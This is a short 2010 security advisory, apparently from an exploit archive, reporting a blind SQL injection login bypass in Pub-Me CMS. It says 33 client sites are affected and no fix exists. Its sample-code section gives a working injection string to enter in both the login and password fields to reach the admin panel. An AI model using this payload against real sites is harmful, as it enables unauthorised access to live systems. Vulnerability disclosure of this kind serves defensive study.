Pub-Me CMS Blind SQL Injection Vulnerability

2010-10-29 10:15:25

_______ _____ ___
| | | | |.' _|
| |__ | _|
|___|___| |__||__|

Pub-Me CMS Blind SQL Injection Vulnerability

Name: Pub-Me CMS
Vendor: http://www.pub-me.com/
Versions Affected: //unknown, all current affected - devel. homepage & 33 clients web pages
Software Link: Not aviable, Demo can be requested by e-mail from vendor
Found by: H4f, <Sec was born project, Anonymous submission>
Contact: zotrob [at] gmail [dot] com
Date: 2010-10-25

X. INDEX

I. ABOUT THE APPLICATION
II. DESCRIPTION
III. ANALYSIS
IV. SAMPLE CODE
V. FIX


I. ABOUT THE APPLICATION
________________________

Pub-Me Content Managment System is designed to make it possible for you to pay full
attention to the content without having to bother about technologies.

II. DESCRIPTION
_______________

NOT properly sanitised form before being used
in a SQL query.


III. ANALYSIS
_____________

Summary:

All Pub-Me based websites are vulnerable, any more/less trained monkey can reach admin panel.
______________________


IV. SAMPLE CODE
_______________

Blind SQL Injection

Login> ' or 0=0 #
Pass> ' or 0=0 #

V. FIX
______

Vedor contacted, no reponse.

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.